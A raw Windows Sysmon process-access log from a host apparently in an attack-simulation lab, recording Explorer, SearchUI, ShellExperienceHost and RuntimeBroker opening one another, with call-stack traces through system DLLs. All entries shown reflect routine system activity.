13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012016Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012015Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+bae7e|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012014Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000012013Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012012Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012011Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012010Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012009Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000012008Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.148{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e 10341000x800000000000000013144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000013140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\Windows.Storage.dll+1418c7|C:\Windows\System32\Windows.Storage.dll+1412a3|C:\Windows\System32\Windows.Storage.dll+141129|C:\Windows\System32\Windows.Storage.dll+103361|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a205e|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a1fc8|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+a1faa|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+a1faa|C:\Windows\System32\SHELL32.dll+d3fe2|C:\Windows\System32\SHELL32.dll+dd79a|C:\Windows\System32\Windows.Storage.dll+1570dd|C:\Windows\System32\Windows.Storage.dll+156d23|C:\Windows\System32\Windows.Storage.dll+103180|C:\Windows\System32\Windows.Storage.dll+102e5a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+141977|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:36.851{59A5CD1D-93F9-6005-F104-00000000A301}45405968C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\Windows.Storage.dll+1418e2|C:\Windows\System32\Windows.Storage.dll+140f51|C:\Windows\System32\Windows.Storage.dll+140e7c|C:\Windows\System32\Windows.Storage.dll+10423b|C:\Windows\System32\Windows.Storage.dll+103f88|C:\Windows\System32\Windows.Storage.dll+103bcd|C:\Windows\System32\Windows.Storage.dll+102e4a|C:\Windows\System32\Windows.Storage.dll+1561fe|C:\Windows\System32\Windows.Storage.dll+155f75|C:\Windows\System32\Windows.Storage.dll+665ac|C:\Windows\System32\Windows.Storage.dll+66700|C:\Windows\System32\Windows.Storage.dll+e91e1|C:\Windows\System32\Windows.Storage.dll+e8a72|C:\Windows\System32\Windows.Storage.dll+e6459|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
